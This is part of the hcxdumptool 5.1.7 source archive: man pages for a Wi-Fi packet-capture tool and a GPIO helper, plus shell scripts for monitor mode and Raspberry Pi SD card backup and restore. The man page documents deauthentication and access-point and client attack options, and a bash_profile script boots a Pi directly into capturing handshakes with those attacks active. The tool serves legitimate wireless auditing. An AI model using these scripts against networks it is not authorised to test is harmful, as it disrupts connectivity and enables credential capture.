copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. hcxdumptool-5.1.7/manpages/000077500000000000000000000000001350370021700156635ustar00rootroot00000000000000hcxdumptool-5.1.7/manpages/hcxdumptool.1000066400000000000000000000062551350370021700203230ustar00rootroot00000000000000.TH HCXDUMPTOOL "1" .SH NAME hcxdumptool - capture packets from wifi devices .SH SYNOPSIS .B hcxdumptool .SH DESCRIPTION .BI hcxdumptool is a tool to capture packets from wifi devices and store the information in pcapng format. .SH AUTHOR This manual page was written by Mike (ZeroBeat). Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so. License MIT .SH OPTIONS .TP .B Common options: .TP .I -i interface (monitor mode will be enabled by hcxdumptool) .TP .I -o output management frames and EAP/EAPOL frames in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) .TP .B Other options: .TP .I -O output unencrypted IPv4 and IPv6 frames in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) .TP .I -W output encrypted WEP frames in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) .TP .I -c set scan list channels (1,2,3,...) 
.TP .I -t stay time on channel before hopping to the next channel .TP .I -T set maximum ERROR count (hcxdumptool terminates when the value is reached) .TP .I -E EAPOL timeout .TP .I -D deauthentication interval .TP .I -A ap attack interval .TP .I --filterlist= mac filter list .TP .I --filtermode= mode for filter list .TP .I --silent do not transmit packets .TP .I --disable_active_scan do not transmit proberequests to BROADCAST using a BROADCAST ESSID .TP .I --disable_deauthentications disable transmitting deauthentications .TP .I --give_up_deauthentications= .TP .I --disable_disassociations disable transmitting disassociations .TP .I --disable_ap_attacks disable attacks on single access points .TP .I --give_up_ap_attacks= disable transmitting directed proberequests after n tries .TP .I --disable_client_attacks disable attacks on single clients .TP .I --do_rcascan show radio channel assignment (scan for target access points) .TP .I --ap_mac= use this MAC address for access point as start MAC .TP .I --station_mac= use this MAC address for station .TP .I --station_vendor= use this VENDOR information for station .TP .I --use_gpsd use GPSD to retrieve position .TP .I --save_rcascan= output rca scan list to file when hcxdumptool terminated .TP .I --save_rcascan_raw= output file in pcapng format .TP .I --enable_status= enable status messages .TP .I --gpio_button= Raspberry Pi GPIO pin number of button (2...27) .TP .I --gpio_statusled= Raspberry Pi GPIO number of status LED (2...27) .TP .I --poweroff once hcxdumptool terminated, power off system .TP .I --ignore_warning hcxdumptool will not terminate if other services take access on the device .TP .I -I show wlan interfaces .TP .I -C show available channels and quit .TP .I -h or --help show help screen .TP .I -v or --version show version .TP hcxdumptool-5.1.7/manpages/hcxpioff.1000066400000000000000000000016661350370021700175640ustar00rootroot00000000000000.TH HCXPIOFF "1" .SH NAME hcxpioff - control Raspberry Pi via GPIO 
.SH SYNOPSIS .B hcxpioff .SH DESCRIPTION .BI hcxdumptool is a tool to control Raspberry Pi via GPIO (hardware modification required). .SH AUTHOR This manual page was written by Mike (ZeroBeat). Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so. License MIT .SH OPTIONS .TP .B Common options: .TP .I --gpio_button= Raspberry Pi GPIO pin number of button (2...27) .TP .I --gpio_statusled= Raspberry Pi GPIO number of status LED (2...27) .I -h or --help show help screen .TP .I -v or --version show version .TP hcxdumptool-5.1.7/usefulscripts/000077500000000000000000000000001350370021700170035ustar00rootroot00000000000000hcxdumptool-5.1.7/usefulscripts/bash_profile000077500000000000000000000013231350370021700213650ustar00rootroot00000000000000#!/bin/bash cd /home export WLANDEV=`ls -1 /sys/class/net | grep ^wl` if [[ ! 
-z $WLANDEV ]] then ARCHIVNAME=`date +'%Y%m%d%H%M'` ip link set $WLANDEV down iw dev $WLANDEV set type monitor ip link set $WLANDEV up hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --give_up_ap_attacks=100000 --give_up_deauthentications=100000 # hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --disable_ap_attacks --disable_deauthentications -t 120 fi hcxpioff --gpio_button=4 --gpio_statusled=17 & systemctl start dhcpcd@eth0.service systemctl start sshd.service hcxdumptool-5.1.7/usefulscripts/killmonnb000077500000000000000000000010171350370021700207150ustar00rootroot00000000000000#!/bin/sh if test -z "$1" then for IFACE in `ls -1 /sys/class/net | grep ^wl` do printf "$IFACE " cat /sys/class/net/$IFACE/address done printf "\nelect WLAN interface: " read WLANDEV else WLANDEV=$1 fi echo "deactivating monitor mode on $WLANDEV" sudo ip link set $WLANDEV down sudo iw dev $WLANDEV set type managed sudo ip link set $WLANDEV up sudo iw dev $WLANDEV info echo "activating NetworkManager and wpa_supplicant" sudo systemctl start NetworkManager.service sudo systemctl start wpa_supplicant.service hcxdumptool-5.1.7/usefulscripts/makemonnb000077500000000000000000000010161350370021700206760ustar00rootroot00000000000000#!/bin/sh if test -z "$1" then for IFACE in `ls -1 /sys/class/net | grep ^wl` do printf "$IFACE " cat /sys/class/net/$IFACE/address done printf "\nselect WLAN interface: " read WLANDEV else WLANDEV=$1 fi echo "deactivating NetworkManager and wpa_supplicant" sudo systemctl stop NetworkManager.service sudo systemctl stop wpa_supplicant.service echo "activating monitor mode on $WLANDEV" sudo ip link set $WLANDEV down sudo iw dev $WLANDEV set type monitor sudo ip link set $WLANDEV up sudo iw dev $WLANDEV info 
hcxdumptool-5.1.7/usefulscripts/pireadcard000077500000000000000000000011251350370021700210260ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nchoose device: " read DEVICE sudo fsck /dev/"$DEVICE"1 sudo fsck /dev/"$DEVICE"2 if [ -f "rpiboot.tgz" ] then rm -f rpiboot.tgz fi if [ -f "rpiroot.tgz" ] then rm -f rpiroot.tgz fi echo "mount boot" if [ ! -d "boot" ] then mkdir boot fi sudo mount /dev/"$DEVICE"1 boot cd boot sudo tar -zcvf ../rpiboot.tgz . sync cd .. echo "mount root" if [ ! -d "root" ] then mkdir root fi sudo mount /dev/"$DEVICE"2 root cd root sudo tar --exclude=var/log --exclude=lost+found -zcvpf ../rpiroot.tgz . sync cd .. sudo umount boot sudo umount root rm -r boot rm -r root hcxdumptool-5.1.7/usefulscripts/piwritecard000077500000000000000000000011651350370021700212510ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nchoose device: " read DEVICE printf "\033[0;31m o p n p 1 +100M t c n p 2 w \033[1;0m\n" sudo fdisk /dev/$DEVICE echo "erstelle Filesystem boot" sudo mkfs.fat -F32 /dev/"$DEVICE"1 echo "erstelle Filesystem root" sudo mkfs.ext4 /dev/"$DEVICE"2 echo "mount boot" if [ ! -d "boot" ] then mkdir boot fi sudo mount /dev/"$DEVICE"1 boot cd boot sudo tar -zxvf ../rpiboot.tgz sync cd .. echo "mount root" if [ ! -d "root" ] then mkdir root fi sudo mount /dev/"$DEVICE"2 root cd root sudo tar -zxvf ../rpiroot.tgz sync cd .. sudo umount boot sudo umount root rm -r boot rm -r root